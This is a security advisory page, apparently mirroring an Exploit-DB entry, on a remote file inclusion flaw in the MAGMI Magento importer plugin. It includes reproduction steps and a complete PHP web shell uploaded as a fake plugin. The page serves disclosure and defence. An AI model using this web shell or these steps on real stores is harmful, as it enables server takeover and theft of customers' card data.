MAGMI File Inclusion Vulnerability

vendor:

Magento Mass Importer (MAGMI)

by:

Parvinder Bhasin

8,8

CVSS

HIGH

Remote File Inclusion (RFI)

CWE

Product Name: Magento Mass Importer (MAGMI)

Affected Version From: Magento CE - 1.8, MAGMI v0.7.17a

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2014

MAGMI File Inclusion Vulnerability

MAGMI (MAGento Mass Importer) suffers from File inclusion vulnerability (RFI) which allows an attacker to upload essentially any PHP file (without any sanity checks). This PHP file could then be used to skim credit card data, rewrite files, run remote commands, delete files..etc. Essentially, this gives attacker ability to execute remote commands on the vulnerable server.

Mitigation:

Ensure that all user-supplied input is validated and filtered before being used in any file operations. Sanitize user input and use whitelisting techniques to ensure that only expected characters are accepted.

Source

Exploit-DB raw data:

Exploit found date:  10/24/2014
Security Researcher name:  Parvinder Bhasin
Contact info:  parvinder.bhasin@gmail.com
twitter:  @parvinderb - scorpio

Currently tested version:
Magento version:  Magento CE - 1.8 older
MAGMI version: v0.7.17a older

Download software link:
Magento server:  http://www.magentocommerce.com/download
MAGMI Plugin:
https://sourceforge.net/projects/magmi/files/magmi-0.7/plugins/packages/

MAGMI (MAGento Mass Importer) suffers from File inclusion vulnerability
(RFI) which allows an attacker to upload essentially any PHP file (without
any sanity checks).  This PHP file could then be used to skim credit card
data, rewrite files, run remote commands, delete files..etc.  Essentially,
this gives attacker ability to execute remote commands on the vulnerable
server.


Steps to reproduce:

1.  http://<a magentosite.com>/magmi/web/magmi.php
2.  Under upload new plugins:
click on "choose file"
MAGento plugins are basically php file zipped.  So create a php shell and
zip the file. ex: evil.php  ex: zip file: evil_plugin.zip.  After the file
has been uploaded, it will say:  Plugin packaged installed.
 evil.php:

 <?php
if (isset($_POST['command'])){
echo "<form action='evil.php' method='post'>
      <input type='text' name='command' value=''/>
      <input type='submit' value='execute'/>
      </form>";

    if(function_exists('shell_exec')) {
    $command=$_POST['command'];
    $output = shell_exec("$command");
    echo "<pre>$output</pre>";
   }
}
else {
  echo "<form action='evil.php' method='post'>
      <input type='text' name='command' value=''/>
      <input type='submit' value='execute'/>
      </form>";
}
?>

3.  Your malicious evil.php file is extracted now.  All you then need to do
is just access the evil.php page from:
http://<amagentosite.com>/magmi/plugins/evil.php
 At this point you could really have access to the entire system.  Download
any malware, install rootkits, skim credit card data ..etc.etc.